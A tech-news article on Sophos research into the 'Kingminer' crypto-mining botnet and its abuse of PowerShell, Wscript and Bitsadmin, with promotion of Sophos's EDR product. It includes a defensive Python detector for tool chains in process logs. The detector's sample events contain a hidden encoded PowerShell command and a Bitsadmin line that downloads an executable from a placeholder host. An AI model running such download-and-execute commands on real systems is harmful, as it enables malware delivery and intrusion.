Cyber-criminals are using a mixture of advanced techniques & copy-paste methods, combined with perfectly legitimate tools, research from Sophos into the ‘Kingminer’ botnet reveals.
The ‘Kingminer’ botnet operators are using legitimate tools such as PowerShell, Wscript & Bitsadmin. This means that being able to query how legitimate tools are used & how they interact with one another is now a necessary defence technique against attacks built on misusing legitimate components.
The State of Ransomware 2020 report from Sophos explains that nearly a quarter of organisations breached by these attacks were actually able to detect the ransomware attack & stop it before it encrypted their data.
Paul Ducklin, Principal Research Scientist at Sophos, observed of illicit crypto-mining, “The Kingminer attackers aren’t really concerned with innovation but with adaptation, meaning that they take existing malicious techniques & tools and tweak them or combine them to blend in for as long as possible.
“Illicit Crypto-mining follows a simple underlying equation: the longer the criminals go unnoticed, the longer they mine, & thus the more money they make. Unlike a ransomware attack, which involves careful preparation followed by an assault you cannot fail to notice, criminal Crypto-mining is about being an unseen, electricity-eating parasite for as long as you can.”
Sophos’ research into the ‘Kingminer’ botnet concludes:
- Cyber-criminals are now using a combination of sophisticated techniques & copy-paste tactics
- Attackers are relying increasingly on legitimate tools such as PowerShell, Wscript & Bitsadmin to achieve their aims, & so being able to query how legitimate tools are used & interact with each other is a useful defence technique against attacks that are built on abusing legitimate components
- ‘Kingminer’ shares many of the features of other advanced ransomware attacks. In the ‘State of Ransomware 2020’ report, nearly a quarter (24%) of organisations breached by these ransomware hacks were actually able to detect the ransomware assault & stop it before it was able to encrypt their files.
Sophos has also revealed an updated version of its ‘Endpoint Detection and Response’ (EDR), which it calls ‘the most significant product upgrade ever done by Sophos.’
Sophos’ EDR now includes new ‘Live Discover and Response’ capabilities to quickly identify & then neutralise evasive threats & proactively maintain IT operations, also allowing organisations to search for previous & current indicators of compromise.
Ryan Miller, Chief Information Security Officer, Mission Search, commented, “Sophos EDR is a force multiplier that gives me the tools I need to do the job of an entire team without adding additional headcount.
“This new version drastically reduces the time it takes to detect and respond to incidents, saving me on average 4-5 hours every day. Easy to use SQL queries simplify the previously complex & time-intensive process of investigating suspicious activity & allow me to perform searches that are completely unique to my network.
“As the Chief Information Security Officer of a Joint Commission certified healthcare staffing firm, I am extremely sensitive to any time delays in receiving warnings related to suspicious activity that could be a precursor of a malicious attack designed to obtain sensitive data.”
Gabor Szappanos, Threat Research Director at Sophos explained that the world of cyber-criminals is a “heterogeneous mass” with many different capability & resourcing levels.
Properly understanding these differing capabilities is highly important in devising new defensive techniques.
Szappanos has further warned that the operators of the ‘Kingminer’ botnet are both ambitious & capable, but they do not have ‘unlimited’ resources. They use any solution & concept that is ‘freely available’, from public domain tools to the methods used by ‘Advanced Persistent Threat’ groups.
He further added, “This is a classic example of a lower rung cyber-gang unit copying an APT-style attack; in this case, a Chinese APT attack method, & using it as a blueprint for ‘Kingminer’. Sophos has explained how some cyber-criminals use other attacks as ‘blueprints’, & this is revealing evidence that the tendency continues, if not becoming even more persistent, because it is ‘cost-effective’ & well-proven.
“Many parts of the ‘Kingminer’ attack are orchestrated using legit or greyware applications & PowerShell scripts. For defenders, this is where application control & other EDR features that detect suspicious ‘Living off the Land’ activity, as well as AMSI detections, can play a huge role.”
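The defensive idea raised above, querying how legitimate tools interact rather than flagging any single one, can be expressed as a parent-chain check over process-creation events. The code below is an added example and is not Sophos’ code or part of its EDR; the events are constructed, the field names loosely follow Sysmon process-creation logs, and the watched-binary set and the two-tool threshold are assumptions chosen for illustration.

```python
"""Flag chains of legitimate Windows tools in process-creation logs.

Constructed sample events (not from Sophos or the Kingminer research).
The watched set and the chain threshold are illustrative assumptions.
"""
from typing import Dict, List, Tuple

# Legitimate binaries the article names as abused by the Kingminer operators
WATCHED = {"powershell.exe", "wscript.exe", "bitsadmin.exe"}

# Constructed process-creation events: pid, parent pid, image name, command line
EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "winword.exe", "cmdline": "winword.exe report.docx"},
    {"pid": 300, "ppid": 200, "image": "wscript.exe", "cmdline": "wscript.exe //e:jscript update.js"},
    {"pid": 400, "ppid": 300, "image": "powershell.exe", "cmdline": "powershell.exe -w hidden -enc AAAA"},
    {"pid": 500, "ppid": 400, "image": "bitsadmin.exe",
     "cmdline": "bitsadmin.exe /transfer job http://example.invalid/x %TEMP%\\x.exe"},
    # A lone, interactive PowerShell session: ordinary admin activity
    {"pid": 600, "ppid": 100, "image": "powershell.exe", "cmdline": "powershell.exe Get-Service"},
]


def ancestry(events: List[Dict], pid: int) -> List[str]:
    """Return lower-cased image names from the given process up to the root (child first)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # 'seen' guards against cyclic or reused pids
        seen.add(pid)
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def suspicious_chains(events: List[Dict], min_tools: int = 2) -> List[Tuple[int, List[str]]]:
    """Return (pid, ancestry) for processes whose lineage uses >= min_tools distinct watched binaries.

    One PowerShell process on its own is not reported; a script host spawning
    PowerShell which then drives a BITS download is the 'legitimate tools
    interacting with one another' pattern the article describes.
    """
    hits = []
    for e in events:
        chain = ancestry(events, e["pid"])
        distinct_tools = {img for img in chain if img in WATCHED}
        if len(distinct_tools) >= min_tools:
            hits.append((e["pid"], chain))
    return hits


if __name__ == "__main__":
    for pid, chain in suspicious_chains(EVENTS):
        print(pid, " <- ".join(chain))
```

Raising `min_tools` to 3 keeps only the full script-host, PowerShell, BITS chain, which is the kind of tuning a defender does to trade coverage against false positives on hosts where scripted PowerShell is routine.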
Sophos has also published new research, ‘An Insider View into the Increasingly Complex ‘Kingminer’ Botnet’, which reveals how the attackers use servers to carry out their attacks, & the importance of threat intelligence in tracing this type of activity.
The ‘Kingminer’ botnet attempts to gain server access by ‘brute-forcing’ login credentials and, among other attack mechanisms, uses the ‘EternalBlue’ exploit to spread the malware, Sophos discovered.
Dan Schiappa, Chief Product Officer, Sophos said that cyber-criminals are ‘raising the stakes’, stopping at ‘nothing’ to capitalise on expanded attack surfaces as organisations increasingly move to the cloud & enable remote work-forces.
Schiappa cautioned, “Servers & other endpoints are all too insufficiently protected, creating vulnerable entry points that are ripe for attackers to exploit.”